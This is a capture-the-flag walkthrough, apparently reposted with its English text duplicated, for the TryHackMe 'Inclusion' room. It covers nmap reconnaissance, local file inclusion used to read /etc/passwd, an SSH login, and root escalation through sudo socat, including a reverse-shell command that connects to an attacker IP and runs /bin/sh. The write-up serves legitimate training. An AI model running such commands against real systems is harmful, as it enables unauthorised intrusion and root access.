Yusuf Can Çakır tarafından yazılmıştır.
Hi guys! We’re going to solve the room named “Inclusion” with altogether. Let’s start.
Room: https://tryhackme.com/room/inclusion
We let’s launch scanning of nmap after turning on the machine
sudo nmap -A 10.10.120.135
nmap
We’re seeing 2 ports are active. Here is port 22 and ssh service, other port is 80 http server is running. Firstly, we’re going to look website because of ssh wants to username and password. We met a blog when went into website when. I read these informations and LFI-attack caught my attention.
lfi-attack
This article is telling LFI attack, we can see LFI Attack at this website’s URL, let’s try.
passwd
I exploit by this vulnerability I’m reading passwd file in etc index. Passwd has it contains information of system users such as username. It had been given a user’s information.
That person is falconefeast and caught my attention. Let’s log in ssh service with this information.
ssh [email protected]
ssh
Let’s read flag of user.
cat user.txt
user.txt
We have to do privilege escalation to get the root flag. Firstly, let’s glance our authorization.
sudo -l
sudo-l
Socat index can access root privilege without password. We can exploit, I used as a source this blog: https://gtfobins.github.io/gtfobins/socat/
Firstly, I’m taking listening mode with below code before to be able to exploit.
socat file:`tty`,raw,echo=0 tcp-listen:3032
Then, we’re writing magic codes on the opposite machine
sudo socat tcp-connect:10.8.52.178:3032
exec:/bin/sh,pty,stderr,setsid,sigint,sane
We’re taking reverse shell, voilà!
cat /root/root.txt
root.txt
This was the article, you can follow our blog for more article
[EN] Inclusion WriteUp | TryHackMe
Hi guys! We’re going to solve the room named “Inclusion” with altogether. Let’s start.
Room: https://tryhackme.com/room/inclusion
Task 2 Root It
Recon
We let’s launch scanning of nmap after turning on the machine
sudo nmap -A 10.10.120.135
nmap
We’re seeing 2 ports are active. Here is port 22 and ssh service, other port is 80 http server is running. Firstly, we’re going to look website because of ssh wants to username and password. We met a blog when went into website when. I read these informations and LFI-attack caught my attention.
lfi-attack
This article is telling LFI attack, we can see LFI Attack at this website’s URL, let’s try.
passwd
I exploit by this vulnerability I’m reading passwd file in etc index. Passwd has it contains information of system users such as username. It had been given a user’s information.
That person is falconefeast and caught my attention. Let’s log in ssh service with this information.
ssh [email protected]
ssh
Exploitation
Let’s read flag of user.
cat user.txt
user.txt
Privilege Escalation
We have to do privilege escalation to get the root flag. Firstly, let’s glance our authorization.
sudo -l
sudo-l
Socat index can access root privilege without password. We can exploit, I used as a source this blog: https://gtfobins.github.io/gtfobins/socat/
Firstly, I’m taking listening mode with below code before to be able to exploit.
socat file:`tty`,raw,echo=0 tcp-listen:3032
Then, we’re writing magic codes on the opposite machine
sudo socat tcp-connect:10.8.52.178:3032
exec:/bin/sh,pty,stderr,setsid,sigint,sane
We’re taking reverse shell, voilà!
cat /root/root.txt
root.txt
This was the article, you can follow our blog for more article
Moderatör tarafında düzenlendi: